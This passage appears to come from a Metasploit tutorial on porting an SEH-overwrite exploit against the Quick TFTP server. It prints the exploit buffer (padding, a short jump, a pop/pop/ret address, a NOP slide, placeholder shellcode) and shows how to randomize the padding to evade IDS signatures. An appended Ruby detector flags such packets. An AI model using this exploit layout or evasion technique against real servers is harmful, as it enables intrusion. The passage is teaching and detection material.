
Porting Exploits to the Metasploit Framework


sploit = "\x00\x02"
sploit << "pwnd"
sploit << "\x00"
sploit << evil
sploit << "\x00"



Following the initial string of As (1019 of them, represented by "\x41" in hexadecimal), we add a short jump to overwrite the Next SE Handler (NSEH). At the beginning of this chapter, we used a simple stack overflow example when we attacked MailCarrier and overwrote the instruction pointer. Here, we overwrite the SEH and the NSEH to break out of the structured exception handler. Then we add the address of a pop/pop/ret sequence of instructions to overwrite SEH, which puts us into an area of memory that we control.

Next, to make sure that the packet will be recognized as a write request by the TFTP server, we append a final value after the shellcode. Now, when we load the module and run it against our target, our debugger should pause with a SEH overwrite, as shown in Figure 15-4.

Figure 15-4: Quick TFTP's initial SEH overwrite

Because that long string of As and the NOP slide sent to the application will set off IDS alarms, we'll replace the As (as in the previous example) with a random selection of uppercase alphabetic characters, and replace the "\x90" characters with NOP equivalents, as shown in the following code:

evil = rand_text_alpha_upper(1019)   # Was: "\x41" * 1019 (Metasploit mixin helper: random uppercase letters)
evil << "\xeb\x08\x90\x90"           # Short Jump
evil << "\x58\x14\xd3\x74"           # pop/pop/ret
evil << make_nops(16)                # Was: "\x90" * 16  # NOP slide (Metasploit mixin helper: NOP-equivalent instructions)
evil << "\xcc" * 412                 # Dummy Shellcode

As always, it's a good idea to check your new module's functionality after every change. As you can see in Figure 15-5, the random characters have been accepted by the application and SEH is still controlled as it was before.
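The two passages above describe the write-request layout the module sends (opcode, filename, NUL, mode, NUL) and then explain why the 1019 As and the NOP slide are easy for an IDS to flag. The following Ruby is an added example, not code from the book or from Metasploit: it parses a TFTP request, measures the two properties a detector would key on (field length and the longest run of one byte value), and runs that check over three constructed packets, one benign, one with the repeated-A padding, and one with the padding randomized. The thresholds, the eight stand-in "handler" bytes, and the random payload stub are assumptions for this example; none of them are the addresses or shellcode from the text.

```ruby
# Added example (not from the book or Metasploit): TFTP request parser plus
# a detection check over constructed packets. Ruby standard library only.

TFTP_OPCODES = { 1 => "RRQ", 2 => "WRQ" }.freeze

# Parse a TFTP read/write request: 2-byte big-endian opcode, then a
# NUL-terminated filename and a NUL-terminated mode. Returns nil when the
# packet is not a well-formed RRQ/WRQ.
def parse_tftp_request(pkt)
  pkt = pkt.b
  return nil if pkt.bytesize < 4
  opcode = pkt.byteslice(0, 2).unpack1("n")
  return nil unless TFTP_OPCODES.key?(opcode)
  fields = pkt.byteslice(2..-1).split("\x00".b, -1)
  # Expect filename, mode, and the empty remainder after the mode's final NUL.
  return nil unless fields.length >= 3
  { opcode: TFTP_OPCODES[opcode], filename: fields[0], mode: fields[1] }
end

# Length of the longest run of one repeated byte value in +s+; this is what
# a signature for "\x41" * 1019 or for a "\x90" slide effectively matches.
def longest_byte_run(s)
  best = run = 0
  prev = nil
  s.each_byte do |b|
    run = b == prev ? run + 1 : 1
    best = run if run > best
    prev = b
  end
  best
end

# Classify a request. The thresholds are assumptions for this example: real
# TFTP filenames and modes are short, so a field longer than max_field bytes
# or a single-byte run longer than max_run bytes is reported.
def analyze_request(pkt, max_field: 255, max_run: 32)
  req = parse_tftp_request(pkt)
  return { verdict: :malformed, reasons: ["not a well-formed RRQ/WRQ"] } if req.nil?
  reasons = []
  %i[filename mode].each do |field|
    value = req[field]
    reasons << "#{field} is #{value.bytesize} bytes (limit #{max_field})" if value.bytesize > max_field
    run = longest_byte_run(value)
    reasons << "#{field} has a #{run}-byte run of one value (limit #{max_run})" if run > max_run
  end
  { verdict: reasons.empty? ? :ok : :suspicious, reasons: reasons, request: req }
end

# Constructed sample packets. The eight "handler" bytes and the payload stub
# are stand-ins, not the addresses or shellcode from the text; the stub avoids
# NUL bytes so the mode field is not cut short.
def sample_packets
  rng = Random.new(1)
  handler_slots = ("J" * 4 + "R" * 4).b                         # stand-in for NSEH + SEH slots
  payload_stub = Array.new(412) { rng.rand(1..255) }.pack("C*")  # stand-in for an encoded payload
  alpha = ("A".."Z").to_a
  naive_mode = ("\x41".b * 1019) + handler_slots + ("\x90".b * 16) + payload_stub
  random_pad = Array.new(1019) { alpha[rng.rand(26)] }.join.b    # the rand_text_alpha_upper idea
  random_mode = random_pad + handler_slots + ("\x90".b * 16) + payload_stub
  wrq = ->(filename, mode) { "\x00\x02".b + filename.b + "\x00".b + mode + "\x00".b }
  {
    benign: wrq.call("config.txt", "octet".b),
    naive: wrq.call("pwnd", naive_mode),
    randomized: wrq.call("pwnd", random_mode)
  }
end

if __FILE__ == $PROGRAM_NAME
  sample_packets.each do |name, pkt|
    result = analyze_request(pkt)
    puts "#{name}: #{result[:verdict]} #{result[:reasons].join('; ')}"
  end
end
```

Run stand-alone, the naive packet is reported twice (oversized mode field and a 1019-byte run of 0x41), while the randomized packet is reported only for its length: randomizing the padding defeats the byte-run signature, which is the evasion the text describes, but a length check on the mode field still catches both. The 16-byte NOP slide sits under the run threshold here, which is why the text also swaps it for NOP equivalents.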